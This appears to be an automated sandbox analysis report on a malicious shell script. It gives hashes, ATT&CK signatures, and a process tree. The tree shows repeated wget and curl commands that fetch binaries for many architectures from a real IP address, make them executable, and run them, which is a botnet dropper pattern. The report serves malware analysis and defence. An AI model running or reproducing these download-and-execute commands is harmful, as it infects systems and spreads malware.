Analysis
-
max time kernel
2s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
21/11/2024, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
-
Size
1KB
-
MD5
0b5a60057fc9d9ce95ba5cdaab501e68
-
SHA1
879040e7114865f81dbd3f2fb41409e0cb3b8966
-
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
-
SHA512
d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1498 chmod 1506 chmod 1511 chmod 1521 chmod 1533 chmod 1516 chmod 1539 chmod 1544 chmod 1549 chmod 1554 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 1499 3AvA /tmp/3AvA 1507 3AvA /tmp/3AvA 1512 3AvA /tmp/3AvA 1517 3AvA /tmp/3AvA 1522 3AvA /tmp/3AvA 1534 3AvA /tmp/3AvA 1540 3AvA /tmp/3AvA 1545 3AvA /tmp/3AvA 1550 3AvA /tmp/3AvA 1555 3AvA -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1500 wget 1504 curl 1505 cat 1507 3AvA -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGxModz.mpsl curl File opened for modification /tmp/IGxModz.arm6 curl File opened for modification /tmp/IGxModz.arm7 curl File opened for modification /tmp/IGxModz.ppc curl File opened for modification /tmp/IGxModz.m68k curl File opened for modification /tmp/IGxModz.x86 curl File opened for modification /tmp/3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh File opened for modification /tmp/IGxModz.mips curl File opened for modification /tmp/IGxModz.arm4 curl File opened for modification /tmp/IGxModz.arm5 curl File opened for modification /tmp/IGxModz.sh4 curl
Processes
-
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh1⤵
- Writes file to tmp directory
PID:1494 -
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.x862⤵PID:1495
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.x862⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/catcat IGxModz.x862⤵PID:1497
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:1499
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
PID:1500
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1504
-
-
/bin/catcat IGxModz.mips2⤵
- System Network Configuration Discovery
PID:1505
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1507
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mpsl2⤵PID:1508
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/catcat IGxModz.mpsl2⤵PID:1510
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:1512
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm42⤵PID:1513
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm42⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/catcat IGxModz.arm42⤵PID:1515
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:1517
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm52⤵PID:1518
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm52⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/catcat IGxModz.arm52⤵PID:1520
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:1522
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm62⤵PID:1523
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm62⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/catcat IGxModz.arm62⤵PID:1532
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:1534
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm72⤵PID:1535
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm72⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/catcat IGxModz.arm72⤵PID:1538
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:1540
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.ppc2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.ppc2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/catcat IGxModz.ppc2⤵PID:1543
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:1545
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.m68k2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.m68k2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/catcat IGxModz.m68k2⤵PID:1548
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:1550
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.sh42⤵PID:1551
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.sh42⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/catcat IGxModz.sh42⤵PID:1553
-
-
/bin/chmodchmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H12⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:1555
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
276B
MD5960b4fa9d5383373f0a1ea04929df01b
SHA1f78054d817db7742162a706b5d9f1fedcdf21140
SHA2563e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA5122d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f